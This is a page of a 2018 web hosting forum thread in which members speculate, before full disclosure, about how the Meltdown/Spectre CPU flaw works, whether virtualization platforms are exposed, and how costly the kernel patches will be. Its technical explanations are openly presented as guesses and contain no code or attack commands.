Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Your Intel x86 CPU is Deeply Flawed (Meltdown/Spectre) - Page 2
New on LowEndTalk? Please Register and read our Community Rules.

All new Registrations are manually reviewed and approved, so a short delay after registration may occur before your account becomes active.

Your Intel x86 CPU is Deeply Flawed (Meltdown/Spectre)

Comments

• bsdguybsdguy Member
    edited January 2018

@perennate

There is the caveat of the whole thing not really being known; right now we're based on educated guesses based on credible hints. But I'll try to explain:

When interacting with the kernel there is memory (think "buffers" as a typical example) involved, be it explicitly ("write this buffer to the disk") or implicitly (lots of process related info the kernel keeps and needs).

The second part one needs to understand is separation. A normal program must not be able to access kernel memory which is privileged. Think about that and you see that that means that loads of data (typically buffers of some sort) need to be actually copied around which also brings considerable housekeeping work for the kernel.

So it seemed attractive to implement that separation in a "smart" way, namely as pseudo-separation. Now, we get close to the hot spot ...

The implementation of that mechanism is such that no "official" user program instruction can access kernel memory. But there are also "unofficial" instructions, namely those in a branch which get processed speculatively. The reason for that is that branches (of conditionals like an "if" instruction), or more precisely, wrong predictions, are very expensive, i.a. because they tend to invalidate cache lines.

To be as fast as any possible modern processors try two strategies, a) they try to predict which branch will be taken, and b) they try to process the "losing" branch anyway (which is feasible as many instructions can be parallelized in a processor).

And that's where the problem arises because the "watchdog" that guards memory access is looking only at the active branch and such the code in the inactive branch can access kernel memory during a tiny time window while it is a) the losing but b) the anyway pre-executed branch.

Kindly note that, again, I do not know that as intel and the OS developers still keep the lid on it for now, but I assume that my explanation is a reasonable enough attempt to explain.

Let's move on. What is that pre-execution in parallel and are really both branches processed? Answer: Kind of. Of, course, not all op codes can be and are executed in parallel. But some can be and are. Importantly, modern processors are optimized to do as much housekeeping as any possible. Think of it as a factory where one insanely expensive machine is the decisive resource; so obviously one will design the whole production process so as to utilize that central machine at 100% if any possible and to make sure that everything is ready and well prepared. Same in a processor and one of the main preparations (and a complex one at that considering all the cache and memory levels, dma, barriers/fences, etc) is to have all possibly required data readily available. Wrt branch prediction and pre execution this means to have, if any possible (and usually it is) all data for the losing branch available, too.

Now, branch prediction is no magic. One can know (or at least guess with very good success rates) which branch the processor will consider the winning one at every given nanosecond. Hence one can create code with an "innocent" almost certainly winning branch and a "poisoned" almost certainly loosing branch (which is illegaly accessing kernel memory).

Now comes the second part of the evil act. Preparing or loading data sound innocent and simple - but isn't. It's, in fact, a very complex machinery. And considering that a ram access is about 100 times or so slower than a cache access that machinery is quite optimized towards not easily throwing away data in the cache - which is exactly what we want as evil guys because it means that a split micro second later some evil code will have those kernel data available and the good thing (for the evil guy) is that those data are considered pre-checked and legal (because a cpu won't waste cycles on loading forbidden memory).

Again, once more, I might be wrong in some parts as we all can't but make more or less educated guesses right now! Somehow, however, two things must happen, namely the loading of illegal (kernel) memory and, also important, the "cleaning" so as to allow a user process to access that memory. I'm also quite confident that I'm not too far off because there is yet another condition to be met which strongly limits the possibilities, namely the fact that the fuckup can't be repaired or at least somewhat mitigated in firmware.

So, xen this or that don't play a role because the "virtual processor" is just a slightly disguised incarnation of a real one. Moreover, virtualization is happening on a layer way above what we're talking about here.

Sorry for the long post but the guts of processors aren't that easy to explain in a few words in a reasonably understandable way.

P.S. Based on what we know so far I assume that there is bit of half way good news, too: I guess that chances aren't bad that the fuckup allows read only access.

• NeoonNeoon Community Contributor, Veteran

AMD! no problem.

Thanked by 3rm_ ehab coreflux
  • jarjar Patron Provider, Top Host, Veteran

@Neoon said:
    AMD! no problem.

"We were prepared for this and now sell the top performing VZ containers." - Probably some Virtuozzo host that put AMD in their nodes purely because they thought "more cores = more containers per 1U rack space" (aka every EIG brand).

Thanked by 3WSS netomx shovenose
  • MaouniqueMaounique Host Rep, Veteran
    edited January 2018

bsdguy said: P.S. Based on what we know so far I assume that there is bit of half way good news, too: I guess that chances aren't bad that the fuckup allows read only access.

I think that is enough to read keys and stuff, after all, on an encrypted system those are needed all the time, however, it is like the cloudflare (?) bug which allowed for a while unencrypted blobs to be read more or less at random.
    If that is the situation (and I doubt as much as you do without the actual proven facts and at least some kind of PoC), there will be highly unlikely a VM will be able to exploit this without hogging the CPU insanely beyond any reasonable threshold for intervention, and we talk containers here, not to mention things like Xen which play much more nicely with credits and sharing. The "poisonous" code you mention will have a very tiny window of opportunity to read AND save (which involves a lot heavier operations than reading the cache) somewhere the contents which will be more or less garbage most of the time, even when the "innocent" code will be specifically crafted to request operation involving sensitive data.
    I am also inclined to believe that, while this is absolutely possible in containers, in Xen or KVM and full visualizations with fake hardware and all, a) it will be much more expensive for the attacker (will hog more CPU to get any kind of valuable data), and, b), some ways of handling the data in the rings HAS TO hinder, at least, if not render moot altogether, this scenario, albeit nothing is certain right now.
    I do think at least Xen HVM, VMWare, virtualbox and the like will have serious "natural defenses", with KVM somewhat better protected than Xen-PV, but still lower than the former in the list. The containers will be the most exposed, though, coupled with the insane number of threads and switching, it will be probably the death knell for OVZ 6 on anything else than AMD CPUs UNLESS the devs manage to find another trick in their bursting bag which will make this kind of attack impossible at container level..

Thanked by 2NodePing Shazan

Video for that:

• @WSS said:
    I like the fact that this patch currently forces ALL Intel based CPUs to use PTI.

it currently forces ALL x86 cpus, but fear not, AMD comes to the rescue: http://lkml.iu.edu/hypermail/linux/kernel/1712.3/00675.html

Thanked by 1rm_
  • @Maounique

I'm less optimistic. Virtualization serves a purpose and most players (who also happen to define the game) won't waste resources, which translates to virtualization usually not implementing virtual processors (except for the relatively rare cases where other architectures are emulated). Looking at the very few processors, for instance, that actually have more or less good hardware support for x86 emulation provides a good base for a reasonable guess; typically the price to pay is in the 10 - 50% range (e.g. loongson, elbrus cpus). In other words: unattractive and not used but in relatively rare cases where it's absolutely needed.

What is really virtualized is typically i/o related. Moreover the virtualization boundary can be and has been crossed; while not yet something every John or Dick can do, there are vectors available. So, my take on that is that virtualization is to be considered as an additional barrier but by no means an unsurmountable one. That is even more true for the kind of people who are able to (ab)use the fuckup we discuss here; one needs considerable knowledge to make use of that.

Btw (and partly coming back to the virtualization assumption): Let's not forget the driving force behind the current fuckup which is a) cutting corners and tricking, and b) the desire for speed at almost any cost. To put it funny: the current fuckup in a way is a case of virtualization, namely the virtualization of separation.

As for the need to be very quick (to abuse) and "insane number of threads and switching" I don't agree. For one, we are talking about something in the range of tens of clock cycles (insanely fast) that is way below the switching granularity. Moreover, on the level of threads and other context switching the act has already been completed. When switching the OS just sees normal memory.

To clarify: the evil code is in the loosing branch of a conditional and we are talking about mere nanoseconds (if the winning branch is properly constructed which seems reasonable to assume). Next innocent looking code grabs the illegaly loaded into the cache memory, performs a cheap operation (say, xor'ing with a known value) and writes the result - which is the illegally gained and only pro forma "changed" data - back to its own memory. A sequence that happens a zillion times every second and that is absolutely normal (except for one tiny detail). All in all we're talking about something that is about 1/1000 of a thread slice.

And again, everything - except for a small detail that happens within the processor - is perfectly normal and in no way conspicious. I'd be surprised if a hypervisor even had the slightest chance to note what happened; all it sees is perfectly normal code, nothing strange at all.

Also keep in mind that if things happened on a much higher level like virtualization intel could simply change the firmware. think about that! Obviously it's not even something reachable by microcode! What chance would some hypervisor have? Also keep in mind that we wouldn't talk about a performance loss in the range of 15% - 30% if virtualization were a remedy; nope, ten we'd talk about single digit performance loss.

If you want hope then, that's my take, you should bet on access size. Cache lines are damn small and from what I see that's what we talk about. So an attacker will gain just small pieces of kernel memory. Granted, that's deadly enough if well targeted but here I'll stop because things get too speculative. We'll have to wait and to see the kernel changes because those are made by the very few who actually really know the problem.

• MaouniqueMaounique Host Rep, Veteran
    edited January 2018

My take is that, as you say, the data is small and fragmented, then it has to be moved out somehow, which is not even remotely close to 1/1000 of a thread as a read and xor, this will have to be run so many times to be able to catch something "important" and even more to make up a pattern of anything recognizable, it will hog the cpu too much and too often, the virtualization, while not insurmontable as you say, it adds to an already convoluted and stochastic access, further complicating a complicated situation.
    Will it absolutely protect the sensitive data? Probably not. Will it push such an operation beyond the reasonable threshold where some useful data can be mined, making it not worthy, practically impossible? Could be, at least in some cases which may be designed by chance in such a way, or maybe not.

A microcode update should be able to mitigate this, if anything, could make the losing path always non-executable. It will not trigger such a big penalty.
    However, we discuss theory here, while could be entertaining for other people, until we have a PoC to dissect, it remains just that, theory, we can, at most, theorize what could not be, rather than what it is.

• bsdguybsdguy Member
    edited January 2018

@Maounique

If a remedy by microcode were an option it would be out by now or at least publicly announced. Also there wouldn't be a need for the OS people to work on a solution, which they do. Also, btw, I'd be surprised if memory and cache handling were microcoded; I don't think so, for that critical part one bets on hardware.

"Hogging up" - no. Keep in mind that that code doesn't look different from what runs on machines every second.

Where (I guess) you are right is that it wouldn't be exactly practical to get at exactly the right, say, 64 bytes (a cache line) out of megabytes of kernel.
    On the other hand - and quite probably not unrelated - ASLR has been shown to promise a lot more than it can actually offer. Unfortunately some kind of ASLR, properly done, of course, would be one of the primary candidates OS people would look at for a remedy. Which is absolutely not good news and might well explain the silence and the keep-the-lid-on-it attitude of the involved parties.

Also keep in mind that the currently considered remedy approaches (the ones that create 15 - 30% performance loss) mean i.a. that much of the kernel data would need to be changed also structurally (which introduces new risks and problems).

My guess is that the OS people have 2 teams at work. One that tries to find more elegant and less performance drowning remedies (which they must find anyway sooner or later) and the other one implementing the slow and cumbersome "first-aid" remedy, just to be sure.

Thanked by 2simlev adly
  • FranciscoFrancisco Top Host, Host Rep, Veteran

@jarland said:

@Neoon said:
    AMD! no problem.

"We were prepared for this and now sell the top performing VZ containers." - Probably some Virtuozzo host that put AMD in their nodes purely because they thought "more cores = more containers per 1U rack space" (aka every EIG brand).

"Hetzner had them on for cheap".

Still waiting to hear if there's KVM break outs or not. The AWS HVM thing was interesting but it's always possible they live migrated the users if they don't use local storage.

Francisco

• Intel will fly a firmware upgrade faster than AMD will wake up and use this failure for it's own gain.

edited January 2018

https://www.phoronix.com/scan.php?page=article&item=linux-415-x86pti&num=2

up to 60% performance loss, hell no.

Seems to depend heavily on the application, some only a few %.

• adlyadly Veteran

@LTniger said:
    Intel will fly a firmware upgrade faster than AMD will wake up and use this failure for it's own gain.

If it could be fixed with a firmware/microcode update I doubt Intel would have let it get this far. It is curious that AMD doesn’t seem to be really pushing to get its patch mainlined.

• jackbjackb Member, Host Rep
    edited January 2018

@adly said:

@LTniger said:
    Intel will fly a firmware upgrade faster than AMD will wake up and use this failure for it's own gain.

If it could be fixed with a firmware/microcode update I doubt Intel would have let it get this far. It is curious that AMD doesn’t seem to be really pushing to get its patch mainlined.

I am paraphrasing here and do not have much knowledge at this low level, but I believe the reason AMD is not impacted is because of how they handle speculative execution compared to Intel - not a kernel fix that could get mainlined. AMD are exempted from this kernel patch because they aren't vulnerable in the first place.

The AMD microarchitecture
    does not allow memory references, including >speculative references, that
    access higher privileged data when running >in a lesser privileged mode
    when that access would result in a page fault.

>

Disable page table isolation by default on >AMD processors by not setting
    the X86_BUG_CPU_INSECURE feature, which >controls whether X86_FEATURE_PTI
    is set.

• adlyadly Veteran

@jackb I’m referring to the patch AMD submitted to prevent the new protections/PTI from being applied on their processors see. It’s to their benefit that they aren’t impacted by the performance slowdowns.

• randvegetarandvegeta Member, Host Rep
    edited January 2018

Well this is disturbing. So basically all us providers with Intel CPUs will either have this massive security flaw or a massive performance hit?

... bugger!....

It's going to cost the industry as a whole millions! Or possibly billions! If the performance hit is 30%, then it's basically writing off 30% of the equipment's book value. To get back that lost performance would require a 43% increase in CPU capacity. Which would probably mean more of everything, since you can't just add more CPUs to existing servers like you can disk...

So yeah, all us Intel based providers are going to see a 30% drop in (CPU) capacity....

Shit!

• mfsmfs Banned, Member
    edited January 2018

PS: It appears 64-bit ARM Linux kernels will also get a set of KAISER patches, completely splitting the kernel and user spaces, to block attempts to defeat KASLR.

I missed this PS when I first read the link in OP

• AnthonySmithAnthonySmith Member, Patron Provider
    edited January 2018

So, unless some security workaround is found, all of a sudden it is 2011 again and everyone wants Xen PV again for performance, it is going to start costing $7 for 1GB ram again and within a year the ridiculous openVZ is better than Xen arguments will start again.

fun.

Thanked by 1Shazan
  • Well Fsck

AnthonySmith said: So, unless some security workaround is found, all of a sudden it is 2011 again and everyone wants Xen PV again for performance.

No, PV has the patch enforced, which means the performance hit is there.

Jury's out on if HVM/KVM is affected.

Francisco

• hostdarehostdare Member, Patron Provider

Tldr can you someone tell if this affect KVM ?

@hostdare said:
    Tldr can you someone tell if this affect KVM ?

Inside of a users VM it will if they update their kernel, but I guess they can toggle.

Still waiting to see if there's some sort of break-out documented in tomorrow's XEN release that could affect HVM/KVM.

Francisco

Thanked by 2hostdare eva2000

Francisco said: No, PV has the patch enforced, which means the performance hit is there.

ah. so LXC or bust then? :)

@AnthonySmith said:

Francisco said: No, PV has the patch enforced, which means the performance hit is there.

ah. so LXC or bust then? :)

Has LXC been confirmed safe?

Francisco

• ShazanShazan Member, Host Rep

@Francisco said:

Privileged containers are not safe for sure, unprivileged ones maybe, but I wouldn't trust LXC (yet).

@Shazan said:

@Francisco said:

Privileged containers are not safe for sure, unprivileged ones maybe, but I wouldn't trust LXC (yet).

That's just LXC then, I don't think I'll ever trust it :P

Francisco

Thanked by 1Shazan

Finally, OVZ will be killed.

Thanked by 2rm_ WebProject

Neoon said: Finally, OVZ will be killed.

haha, I seriously doubt it.

Thanked by 1Shazan
  • hostdarehostdare Member, Patron Provider

Ovz Wil not be kiled before it's due date

@hostdare said:
    Ovz Wil not be kiled before it's due date

Its already overdue.

Thanked by 1rm_